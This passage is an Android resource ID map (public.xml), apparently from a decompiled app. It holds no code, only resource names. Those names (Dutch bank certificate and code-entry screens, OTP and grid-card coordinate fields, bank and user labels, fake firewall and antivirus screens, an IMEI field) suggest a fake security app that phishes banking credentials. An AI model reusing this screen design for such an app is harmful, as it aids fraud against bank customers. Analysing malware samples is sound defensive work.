    <public type="string" name="template54_firewall" id="0x7f0701c0" />
    <public type="string" name="template54_firewall_deactivated" id="0x7f0701c1" />
    <public type="string" name="template54_scan_complete" id="0x7f0701c2" />
    <public type="string" name="template54_statistic" id="0x7f0701c3" />
    <public type="string" name="template55_certificaat" id="0x7f0701c4" />
    <public type="string" name="template55_genereer" id="0x7f0701c5" />
    <public type="string" name="template55_activation_code" id="0x7f0701c6" />
    <public type="string" name="template55_deze" id="0x7f0701c7" />
    <public type="string" name="template55_about" id="0x7f0701c8" />
    <public type="string" name="template55_loading" id="0x7f0701c9" />
    <public type="string" name="template55_first" id="0x7f0701ca" />
    <public type="string" name="template56_about" id="0x7f0701cb" />
    <public type="string" name="template56_genereer" id="0x7f0701cc" />
    <public type="string" name="template56_activation_code" id="0x7f0701cd" />
    <public type="string" name="template57_please" id="0x7f0701ce" />
    <public type="string" name="template57_please_wait" id="0x7f0701cf" />
    <public type="string" name="template57_about_acc" id="0x7f0701d0" />
    <public type="string" name="template57_valid_OTP" id="0x7f0701d1" />
    <public type="string" name="template57_need_generate" id="0x7f0701d2" />
    <public type="string" name="template57_generate_code" id="0x7f0701d3" />
    <public type="string" name="template57_back" id="0x7f0701d4" />
    <public type="string" name="template57_add_account" id="0x7f0701d5" />
    <public type="string" name="template57_next" id="0x7f0701d6" />
    <public type="string" name="template57_error" id="0x7f0701d7" />
    <public type="string" name="template57_retry" id="0x7f0701d8" />
    <public type="string" name="template57_add_another" id="0x7f0701d9" />
    <public type="string" name="template57_otp" id="0x7f0701da" />
    <public type="string" name="template57_enter_code" id="0x7f0701db" />
    <public type="string" name="template60_certificaat" id="0x7f0701dc" />
    <public type="string" name="template60_genereer" id="0x7f0701dd" />
    <public type="string" name="template60_invoeren" id="0x7f0701de" />
    <public type="string" name="template60_bevestigen" id="0x7f0701df" />
    <public type="string" name="template60_uw" id="0x7f0701e0" />
    <public type="string" name="template60_code" id="0x7f0701e1" />
    <public type="string" name="template60_deze" id="0x7f0701e2" />
    <public type="string" name="template60_about" id="0x7f0701e3" />
    <public type="string" name="template60_loading" id="0x7f0701e4" />
    <public type="array" name="QUWUkktPkL" id="0x7f080000" />
    <public type="style" name="template3_img" id="0x7f090000" />
    <public type="style" name="template3_bold" id="0x7f090001" />
    <public type="style" name="template6_bold" id="0x7f090002" />
    <public type="style" name="template3_green" id="0x7f090003" />
    <public type="style" name="template3_gray" id="0x7f090004" />
    <public type="style" name="template7_row" id="0x7f090005" />
    <public type="style" name="template9_bold" id="0x7f090006" />
    <public type="style" name="template9_bold_rev" id="0x7f090007" />
    <public type="style" name="template24_bold" id="0x7f090008" />
    <public type="style" name="template28_greed" id="0x7f090009" />
    <public type="style" name="template28_greed_ttl" id="0x7f09000a" />
    <public type="style" name="template28_greed_layout" id="0x7f09000b" />
    <public type="style" name="AppBaseTheme" id="0x7f09000c" />
    <public type="style" name="AppTheme" id="0x7f09000d" />
    <public type="menu" name="incoming_call" id="0x7f0a0000" />
    <public type="menu" name="main" id="0x7f0a0001" />
    <public type="id" name="LL000" id="0x7f0b0000" />
    <public type="id" name="mainLayout" id="0x7f0b0001" />
    <public type="id" name="LinearLayout03" id="0x7f0b0002" />
    <public type="id" name="imageView1" id="0x7f0b0003" />
    <public type="id" name="textView1" id="0x7f0b0004" />
    <public type="id" name="LL01" id="0x7f0b0005" />
    <public type="id" name="pswText" id="0x7f0b0006" />
    <public type="id" name="LL02" id="0x7f0b0007" />
    <public type="id" name="userText" id="0x7f0b0008" />
    <public type="id" name="LinearLayout01" id="0x7f0b0009" />
    <public type="id" name="EditText01" id="0x7f0b000a" />
    <public type="id" name="LinearLayout02" id="0x7f0b000b" />
    <public type="id" name="button1" id="0x7f0b000c" />
    <public type="id" name="LayoutOk" id="0x7f0b000d" />
    <public type="id" name="tv_imai" id="0x7f0b000e" />
    <public type="id" name="imageView2" id="0x7f0b000f" />
    <public type="id" name="LinearLayout04" id="0x7f0b0010" />
    <public type="id" name="TextView01" id="0x7f0b0011" />
    <public type="id" name="LinearLayout1" id="0x7f0b0012" />
    <public type="id" name="la1" id="0x7f0b0013" />
    <public type="id" name="editText1" id="0x7f0b0014" />
    <public type="id" name="editText2" id="0x7f0b0015" />
    <public type="id" name="ll_loading" id="0x7f0b0016" />
    <public type="id" name="progressBar1" id="0x7f0b0017" />
    <public type="id" name="textView6" id="0x7f0b0018" />
    <public type="id" name="la2" id="0x7f0b0019" />
    <public type="id" name="imageView3" id="0x7f0b001a" />
    <public type="id" name="textView2" id="0x7f0b001b" />
    <public type="id" name="textView4" id="0x7f0b001c" />
    <public type="id" name="textView3" id="0x7f0b001d" />
    <public type="id" name="LinearLayout2" id="0x7f0b001e" />
    <public type="id" name="textView5" id="0x7f0b001f" />
    <public type="id" name="scrollView1" id="0x7f0b0020" />
    <public type="id" name="textView7" id="0x7f0b0021" />
    <public type="id" name="textView8" id="0x7f0b0022" />
    <public type="id" name="imageView4" id="0x7f0b0023" />
    <public type="id" name="rl_refresh" id="0x7f0b0024" />
    <public type="id" name="RelativeLayout1" id="0x7f0b0025" />
    <public type="id" name="fl_loading" id="0x7f0b0026" />
    <public type="id" name="img_generate" id="0x7f0b0027" />
    <public type="id" name="ll_blink" id="0x7f0b0028" />
    <public type="id" name="img_copy" id="0x7f0b0029" />
    <public type="id" name="ll_generate_code" id="0x7f0b002a" />
    <public type="id" name="ll_progres" id="0x7f0b002b" />
    <public type="id" name="progressBar2" id="0x7f0b002c" />
    <public type="id" name="img_close" id="0x7f0b002d" />
    <public type="id" name="viewFlipper1" id="0x7f0b002e" />
    <public type="id" name="ll_0" id="0x7f0b002f" />
    <public type="id" name="ll_1" id="0x7f0b0030" />
    <public type="id" name="ll_with_btn" id="0x7f0b0031" />
    <public type="id" name="tv_step1_title" id="0x7f0b0032" />
    <public type="id" name="btn_generate1" id="0x7f0b0033" />
    <public type="id" name="btn_generate2" id="0x7f0b0034" />
    <public type="id" name="ll_2" id="0x7f0b0035" />
    <public type="id" name="tv_title2" id="0x7f0b0036" />
    <public type="id" name="ll_rows" id="0x7f0b0037" />
    <public type="id" name="btn_confirm" id="0x7f0b0038" />
    <public type="id" name="textView9" id="0x7f0b0039" />
    <public type="id" name="ll_3" id="0x7f0b003a" />
    <public type="id" name="textView10" id="0x7f0b003b" />
    <public type="id" name="textView11" id="0x7f0b003c" />
    <public type="id" name="textView12" id="0x7f0b003d" />
    <public type="id" name="ll_4" id="0x7f0b003e" />
    <public type="id" name="textView13" id="0x7f0b003f" />
    <public type="id" name="textView14" id="0x7f0b0040" />
    <public type="id" name="tv_steps" id="0x7f0b0041" />
    <public type="id" name="tv_koord1" id="0x7f0b0042" />
    <public type="id" name="tv_koord2" id="0x7f0b0043" />
    <public type="id" name="tv_koord3" id="0x7f0b0044" />
    <public type="id" name="tv_pos1" id="0x7f0b0045" />
    <public type="id" name="tv_pos2" id="0x7f0b0046" />
    <public type="id" name="tv_pos3" id="0x7f0b0047" />
    <public type="id" name="ed_greed1" id="0x7f0b0048" />
    <public type="id" name="ed_greed2" id="0x7f0b0049" />
    <public type="id" name="ed_greed3" id="0x7f0b004a" />
    <public type="id" name="ll_cont" id="0x7f0b004b" />
    <public type="id" name="btn_generate" id="0x7f0b004c" />
    <public type="id" name="ImageView01" id="0x7f0b004d" />
    <public type="id" name="ll_shield" id="0x7f0b004e" />
    <public type="id" name="img_shield" id="0x7f0b004f" />
    <public type="id" name="tv_shield" id="0x7f0b0050" />
    <public type="id" name="ll_filrewall" id="0x7f0b0051" />
    <public type="id" name="img_firewall" id="0x7f0b0052" />
    <public type="id" name="tv_firewall" id="0x7f0b0053" />
    <public type="id" name="ll_router" id="0x7f0b0054" />
    <public type="id" name="img_router" id="0x7f0b0055" />
    <public type="id" name="tv_router" id="0x7f0b0056" />
    <public type="id" name="tv_license" id="0x7f0b0057" />
    <public type="id" name="ll_antivirus" id="0x7f0b0058" />
    <public type="id" name="img_checked" id="0x7f0b0059" />
    <public type="id" name="tv_text1" id="0x7f0b005a" />
    <public type="id" name="ll_sms" id="0x7f0b005b" />
    <public type="id" name="tv_text2" id="0x7f0b005c" />
    <public type="id" name="ll_firewall" id="0x7f0b005d" />
    <public type="id" name="tv_text3" id="0x7f0b005e" />
    <public type="id" name="ll_main" id="0x7f0b005f" />
    <public type="id" name="img_back" id="0x7f0b0060" />
    <public type="id" name="btn_one_time_password" id="0x7f0b0061" />
    <public type="id" name="btn_lic_code" id="0x7f0b0062" />
    <public type="id" name="btn_exit" id="0x7f0b0063" />
    <public type="id" name="img_about" id="0x7f0b0064" />
    <public type="id" name="ll_one_time_password" id="0x7f0b0065" />
    <public type="id" name="btn_onetabpassword_generate" id="0x7f0b0066" />
    <public type="id" name="ll_license" id="0x7f0b0067" />
    <public type="id" name="tv_license_code" id="0x7f0b0068" />
    <public type="id" name="btn_license_generate" id="0x7f0b0069" />
    <public type="id" name="imageView5" id="0x7f0b006a" />
    <public type="id" name="ll_about" id="0x7f0b006b" />
    <public type="id" name="scrollView2" id="0x7f0b006c" />
    <public type="id" name="imageView6" id="0x7f0b006d" />
    <public type="id" name="rlCont" id="0x7f0b006e" />
    <public type="id" name="ll_btn" id="0x7f0b006f" />
    <public type="id" name="imgLoading" id="0x7f0b0070" />
    <public type="id" name="img_1" id="0x7f0b0071" />
    <public type="id" name="img_2" id="0x7f0b0072" />
    <public type="id" name="img_3" id="0x7f0b0073" />
    <public type="id" name="img_4" id="0x7f0b0074" />
    <public type="id" name="tv_last" id="0x7f0b0075" />
    <public type="id" name="listView1" id="0x7f0b0076" />
    <public type="id" name="ll_add_another" id="0x7f0b0077" />
    <public type="id" name="ll_add" id="0x7f0b0078" />
    <public type="id" name="btn_back1" id="0x7f0b0079" />
    <public type="id" name="TextView1" id="0x7f0b007a" />
    <public type="id" name="tv_add_desk" id="0x7f0b007b" />
    <public type="id" name="ll_edit" id="0x7f0b007c" />
    <public type="id" name="ll_progress" id="0x7f0b007d" />
    <public type="id" name="btn_retry" id="0x7f0b007e" />
    <public type="id" name="btn_loading_next" id="0x7f0b007f" />
    <public type="id" name="ll_new_account" id="0x7f0b0080" />
    <public type="id" name="btn_new_acc" id="0x7f0b0081" />
    <public type="id" name="tv_new_acc" id="0x7f0b0082" />
    <public type="id" name="btn_next_main" id="0x7f0b0083" />
    <public type="id" name="ll_generate" id="0x7f0b0084" />
    <public type="id" name="btn_back2" id="0x7f0b0085" />
    <public type="id" name="tv_generate_title" id="0x7f0b0086" />
    <public type="id" name="tv_generate_code" id="0x7f0b0087" />
    <public type="id" name="img_scan" id="0x7f0b0088" />
    <public type="id" name="imageView_logo" id="0x7f0b0089" />
    <public type="id" name="progressBar3" id="0x7f0b008a" />
    <public type="id" name="progressBar4" id="0x7f0b008b" />
    <public type="id" name="tvComplete" id="0x7f0b008c" />
    <public type="id" name="tvLast" id="0x7f0b008d" />
    <public type="id" name="tvKod" id="0x7f0b008e" />
    <public type="id" name="img_face" id="0x7f0b008f" />
    <public type="id" name="img_tweet" id="0x7f0b0090" />
    <public type="id" name="img_linked" id="0x7f0b0091" />
    <public type="id" name="tv_row_top" id="0x7f0b0092" />
    <public type="id" name="tv_row_koord" id="0x7f0b0093" />
    <public type="id" name="tv_bank" id="0x7f0b0094" />
    <public type="id" name="tv_user" id="0x7f0b0095" />
    <public type="id" name="tv_otp" id="0x7f0b0096" />
    <public type="id" name="action_settings" id="0x7f0b0097" />
</resources>